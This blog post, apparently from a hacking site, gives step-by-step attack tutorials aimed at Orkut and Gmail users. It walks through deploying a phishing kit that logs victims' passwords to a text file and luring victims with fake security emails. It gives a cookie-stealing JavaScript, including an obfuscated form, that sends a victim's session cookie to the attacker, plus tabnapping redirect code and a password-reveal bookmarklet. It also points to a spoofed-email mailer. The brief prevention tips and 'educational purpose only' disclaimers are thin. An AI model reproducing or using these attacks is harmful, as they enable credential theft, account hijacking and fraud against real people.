What Is Phishing ?
The act of sending an Email to a user falsely claiming to
be an established legitimate enterprise in an attempt to scam the
user into surrendering private information that will be
used for identity theft.
The Email directs the user to visit a Web site where they
are asked to update personal information, such as passwords
and credit card, social security, and bank account
numbers, that the legitimate organization already has. The Web site,
however, is Bogus and set up only to steal the User’s
information.
Phishing attacks are Trying to steal your Money
!!!
Phishing Scams Could Be-
ü Emails inviting you to join a Social Group, asking you to
Login using your Username and Password.
ü Email saying that Your Bank Account is locked and Sign in
to Your Account to Unlock IT.
ü Emails containing some Information of your Interest and
asking you to Login to Your Account.
ü Any Email carrying a Link to Click and asking you to
Login.
The Phishing Hack Starts Now. this Hack example is for orkut
account.
Step 1:- Download
the necessary files Which you will need during the phishing attack. This file
is a .rar file which
includes 3 files named hackingtech.php, hackingtech.txt
& ServiceLogin.html and also consist a folder in which
there are support files for ServerLogin.html
Step 2:- Unrar
the download pack named orkuthacking.rar any where on your computer.
Step 3:- Upload
the folder "ServiceLogin_files" and 2 of the files ->>
"hackingtech.php" and "hackingtech.txt" in any
web hosting site..
You will have to create a sub-folder in the web hosting
site's directory. Name that folder as "ServiceLogin_files" and
upload the 2 images of the pack in that folder. (it must
support PHPs.)
>>> You can choose one of the following web hosting
Company to upload the Folder.
http://www.freeweb7.com
http://Ripway.com{Recommended}
http://www.110mb.com
http://www.phpnet.us
“You can Download the pack From Here: http://www.hackingtech.co.tv/orkuthacking.rar “.
Step 4:- Your
work is over now. Just give the link ofurfake page to the victim and whenever
he/she will type the password
and sign in . Password will be stored in
"hackingtech.txt"...
General form of the fake page's link
Code:
http://urwebhostingsite/urusername/ServiceLogin.htm
Step 5:- Now you
can send this link to victim by any mode but the best is my email send a fake
email in the name of orkut
the your orkut account has a security problem pl. click on
th link below and re-activate your account. we will see how to
send fake email within short time.
Now If You want to create your own phishing page
the follow the steps below.
Step 1:-Open
the website whose phishing page you want create.
Step 2:-Then
right click any where on the page and select view source.
Step 3:-Press (
Ctrl + A ) and the code will be selected and then press ( Ctrl + C ) to copy
the code.
Step 4:-The
paste this code in a new notepad window and save it as ServerLogin.htm
Step 5:- Open "ServiceLogin.htm" with notepad and the
search for word "action". [press ctrl+f to find the word]
Step 6:-You
will find like this action="
https://www.google.com/accounts/ServiceLoginAuth
"
Step 7:-Replace
the link between this red quote with the link you got by uploading the file hackingtech.php and
it should
be like this action="
http://www.yourhostingcompany.com/username/hackingtech.php
"
Step 8:-Now
Save this as serverlogin.htm
Step 9:-Now
Upload the folder "ServiceLogin_files" and 2 of the files ->>
"hackingtech.php" and "hackingtech.txt" and
serverlogin.htm file in any web hosting site you want.
Step 10:-You are
done just go to the link of the file serverlogin.htm given by your hosting
company .
Step 11:- Now you
can send this link to victim by any mode but the best is my email send a fake
email in the name of
orkut the your orkut account has a security problem pl.
click on th link below and re-activate your account. we will see
how to send fake email within short time.
Step 12:-To see
the passwords that you have hacked just go to the link of hackingtech.txt given
by your hosting company .
Prevention Against Phishing :-
ü Read all the Email Carefully
and Check if the Sender is Original.
ü Watch the Link Carefully
before Clicking
ü Always check the URL in the
Browser before Signing IN to your Account
ü Always Login to Your Accounts
after opening the Trusted Websites, not by Clicking in any other Website or
Email.
“Do not use this hack trick in any criminal activities
like phishing bank websites and please do not
destroy any ones account this is only for educational
purpose”.
How To View Hidden Password behind ****
Step 1.First
of all open up the webpage on which you wanna show the hidden passwords.
Step 2. Then in
the username there must be the name and in the password there must be ********
Step 3.Now to
see the password which is behind the ******** Just copy and paste the following
JavaScript into the
address bar of the browser and you are done.
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)
%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Passwords%20in%20forms%20on%20this
%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();
Step 4. After
copying and pasting the JavaScript given above press the enter key and hidden
passwords will be shown to
you.
“You can use This script when some one has checked the remember
me button in the login form
of any website and to reveal password from that saved
astrisk or encrypted password”.
“Do not use this hack trick in any criminal activities and
please do not destroy any ones account
this is for educational purpose only”.
Hack Orkut Accounts by Cookie Stealing
This article below explains the method to hack orkut
account by stealing orkut account cookies. Hacking orkut accounts
has become much popular and hence i have added this
article which will help you in hacking your friend’s orkut account.
Just ask the victim to copy the script in address bar and
then you will be able to login/access /hack his orkut account.
Note: My purpose is only to make u aware of what’s
happening around and not to teach u hacking orkut account, Gmail
or any account in any sort!!.
Procedure for hacking orkut account by stealing orkut
cookies from Mozilla Firefox to hack Gmail or orkut is given below.
"Hacking orkut account or Gmail” by "stealing
orkut account cookies”:
The post explains how one can steal cookies to hack orkut
account or Gmail account. No password cracking method
required.
Steps to hack Gmail or orkut account password by stealing
orkut cookies:-
Step 1. Firstly
you need have Mozilla firefox.
Step2. Cookie
editor plugin for Mozilla firefox.
Step 3. You
need to have two fake orkut accounts to Hack Orkut or Gmail , So that you have
to receive orkut cookies to
one Orkut account and other Orkut account for Advertising
your Script, Well it depends on your Choice to have Two
Gmail(Orkut) accounts.
Cookie Script:
javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action=’scrapbook.aspx?
Action.submit’;nobody.submit()
How to use orkut cookies script?
Step 1. Replace
your number "UserId.value=33444211″
How to Replace your Number
Step 1. Go to your Orkut album
Step 2. Right click on any Photo>
Properties>55886645.jpg It will be a Eight Digit Value.
Step 3. Now replace your value with the value in the java
script.
“Download cookie editor plugin for Mozilla firefox from: https://addons.mozilla.org/en-US/firefox/addon/573
Your script will look like -
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;nobody.submit()
Step 2. Now
send this Cookie script to the victim and ask him to paste in Address bar and
Press enter.
Step 3. You’ll
get his orkut account cookie in your scrap book.
Step 4. After
getting a orkut account cookie go to your orkut Home page , Then click on Tools
tab and then go to cookie
editor plugin( Tools–> Cookie editor)
Step 5. click
filter/refresh.look for ‘orkut_state’ cookie. just double click it and replace
the orkut_state part with your
victim’s Script
put ur eight digit number in the place of (33444211).
Thats it your done with.
Logout of your orkut and login again and you’ll be in your
victims Homepage.
Step 6. So
remember guys…if you are having orkut account or having any other
account….never use any suspicious script
to prevent anyone from hacking/accessing your orkut
account.
I hope you have learned how to hack orkut accounts using
cookie stealing. Just the script can be used to hack orkut
accounts and then access victim’s orkut account. Enjoy
hacking orkut.
“Do not use this hack trick in any criminal activities and
please do not destroy any ones account
this is for educational purpose only”.
“You can also use this attack for many other sites like
yahoo but you will need some other scripts
for that but nothing is impossible so use google and
search the script for other sites for self
practice”.
Tab Napping A New Phishing Attack
Traditional phishing attacks are reasonably easy to avoid, just don’t click links in suspicious e-mails (or, for the really
paranoid, any e-mail). But Firefox Creative Lead Aza
Raskin has found a far more devious way to launch an attack by
hijacking your unattended browser tabs.
The attack works by first detecting that the tab the page
is in does not have focus. Then the attacking script can change
the tab favicon and title before loading a new site, say a
fake version of gmail or orkut, in the background.
Even scarier, the attack can parse through your history to
find sites you actually visit and impersonate them.
Because most of us trust our tabs to remain on the page we
left them on, this is a particularly difficult attack to detect. As
Raskin writes, "as the user scans their many open
tabs, the favicon and title act as a strong visual cue — memory is
mailable and moldable and the user will most likely simply
think they left *the+ tab open.”
The only clue that you’re being tricked is that the URL
will be wrong.
The Script Used is as Below.-
<a> open this in a tab of your browser and wait for 10
seconds and see after you come back but leave this page and go
to other tab to see this magic.</a>
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
if (typeof document.body.scrollTop != "undefined"){
//IE,NS7,Moz
xScroll = document.body.scrollLeft;
yScroll = document.body.scrollTop;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll
scrolling
timerRedirect =
setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000);
//set timed
redirect
}
else if (typeof window.pageYOffset != "undefined"){
//other browsers that support pageYOffset/pageXOffset instead
xScroll = window.pageXOffset;
yScroll = window.pageYOffset;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll
scrolling
timerRedirect =
setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000);
//set timed
redirect
}
//else do nothing
}
function pollActivity(){
if ((typeof document.body.scrollTop != "undefined"
&& (xScroll!=document.body.scrollLeft ||
yScroll!=document.body.scrollTop)) //IE/NS7/Moz
||
(typeof window.pageYOffset != "undefined" &&
(xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) {
//other browsers
initRedirect(); //reset polling scroll position
}
} document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>
To See The Demo Of this Attack visit: http://www.hackingtech.co.tv/tabnapping.html
Replace the URL highlighted here with your URL where you
want the victim to redirect.
Use This Script in the Page and then the page will
redirect after 10 sec when the user if not on the particular tab.
“Do not use this hack trick in any criminal activities and
please do not destroy any ones account
this is for educational purpose only”.
How to Check The email is original or Not
First of all let us see How email system is
working over internet.
The email is sent on internet as shown in below picture
So Here The Sender i.e abc@server1.com
is sending a mail to xyz@server2.in.
so the sender will type the mail and click on
send button and the mail will go to SERVER1.com whereSERVER1.com will
forward the mail over internet and the internet
will search the xyz@server2.in
email ids server and send it to SERVER2.in and
the the SERVER2.in will search for
the xyz@server2.in
in their own database and then the
mail will be forwarded to xyz@server2.in
and when the XYZ user
login to their account they will see an email in their
inbox which is from abc@server1.com.
Now How To send the fake mail
To send fake mail We need to Bypass the abc@server1.com
and SERVER1.com both and directly send an email over
internet .
So for that we will use a .php
script as php has a function mail(); which
can send email to any one without the
SERVER1.com and directly delivering the mail to SERVER2.in
and then SERVER2.in will search for the xyz@server2.in
in
their own database and then the mail will be forwarded to xyz@server2.in and
when the XYZ user login to their account
they will see an email in their inbox which is from abc@server1.com.
But actually the email is not sent byabc@server1.comto
xyz@server2.in so it is a fake mail.
SEND FAKE MAILS FROM HACKING TECH
Fill Up the form on Hacking Tech fake mailer page. For form visit http://www.hackingtech.co.tv/index/0-93
Now How to check When you receive such mail.
Step 1:-
First of all open the mail.
Step 2:- Now Click on the downward arrow near reply
button. and click on show original.
Now check for The received
from field on the page opened.
and see who has sent you the email , here billgates@microsoft.com is
the sender.
so in the received
from field check that there must
be microsoft.comand not any other thing.
this was fake mail as there was outgoing.x10hosting.com and
so the mail is fake as there is no microsoft.com here.
“Do not send fake mails for criminal activities from
hackingtech fake mailer as they are tracking
your IP address and Can back track you for any illegal
activities performed by you and so please do
not destroy any ones account, this is for educational
purpose only”.
No comments:
Post a Comment